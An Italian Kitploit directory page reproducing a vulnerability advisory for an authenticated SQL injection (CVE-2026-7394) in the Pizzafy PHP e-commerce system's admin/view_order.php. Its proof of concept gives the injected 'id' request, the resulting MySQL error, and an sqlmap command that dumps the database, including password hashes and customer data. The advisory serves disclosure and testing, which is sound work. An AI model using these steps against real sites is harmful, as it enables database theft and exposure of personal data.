Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-7394-SQLI | Kitploit
Strumenti/GitHubGitHub/xmyronn/cve-2026-7394-sqli
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingSicurezza dei Database
GitHubxmyronn/cve-2026-7394-sqli

CVE-2026-7394-SQLI

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

SQL Injection nel sistema e-commerce Pizzafy — admin/view_order.php

Dettagli

CampoValore
FornitoreSourceCodester
ProdottoSistema e-commerce Pizzafy basato su PHP e MySQL
Versione1.0
VulnerabilitàSQL Injection
CWECWE-89
Punteggio CVSSv37.2 (Alto)
Vettore di attaccoRete
Autenticazione richiestaSì (Amministratore)
RicercatoreXmyronn
Data2026-04-11

https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html


Componente interessato

File: Pizzafy/admin/view_order.php
Parametro: id (GET)


Descrizione

L'endpoint admin/view_order.php del sistema e-commerce Pizzafy 1.0 non sanifica correttamente il parametro GET id prima di passarlo a una query MySQL. Un amministratore autenticato può manipolare questo parametro per iniettare SQL arbitrario, portando alla compromissione totale del database.


Prova di concetto

Passaggio 1 — Accesso come Amministratore

Vai a:

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php

Accedi con le credenziali di amministratore.

Passaggio 2 — Vai agli Ordini

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
Screenshot 2026-04-11 212106

Fai clic su View Order per qualsiasi voce di ordine. Screenshot 2026-04-11 212116

Passaggio 3 — Intercetta la richiesta in Burp Suite

La richiesta GET intercettata si presenta così: Screenshot 2026-04-11 212135

Passaggio 4 — Attiva l'errore SQL

Modifica id=1 in id=': Screenshot 2026-04-11 212145

root@kitploit:~
GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1

Risposta — errore MySQL esposto:

root@kitploit:~
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15

Passaggio 5 — Sfruttamento con sqlmap

Salva la richiesta in view_order.txt ed esegui:

root@kitploit:~
sqlmap -r view_order.txt --dump --batch
Screenshot 2026-04-11 212406

sqlmap ha confermato i tipi di iniezione:

TipoTitolo
Boolean-based blindAND boolean-based blind — WHERE clause
Error-basedMySQL >= 5.0 FLOOR error-based
Time-based blindMySQL >= 5.0.12 SLEEP
UNION queryGeneric UNION query — 11 columns

Dump dell'intero database:

root@kitploit:~
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings

I dati sensibili esposti includono hash bcrypt delle password, email dei clienti, dettagli degli ordini e configurazione di sistema.


Impatto

Un amministratore autenticato malintenzionato (o un attaccante che abbia ottenuto le credenziali dell'amministratore) può:

  • Eseguire il dump dell'intero database, inclusi gli hash delle password
  • Leggere i dati personali (PII) sensibili dei clienti (nomi, email, indirizzi, numeri di telefono)
  • Potenzialmente scrivere nel database

Riferimenti

  • SourceCodester — Pizzafy Ecommerce System
  • CWE-89: Improper Neutralization of Special Elements used in an SQL Command.
Scarica lo strumento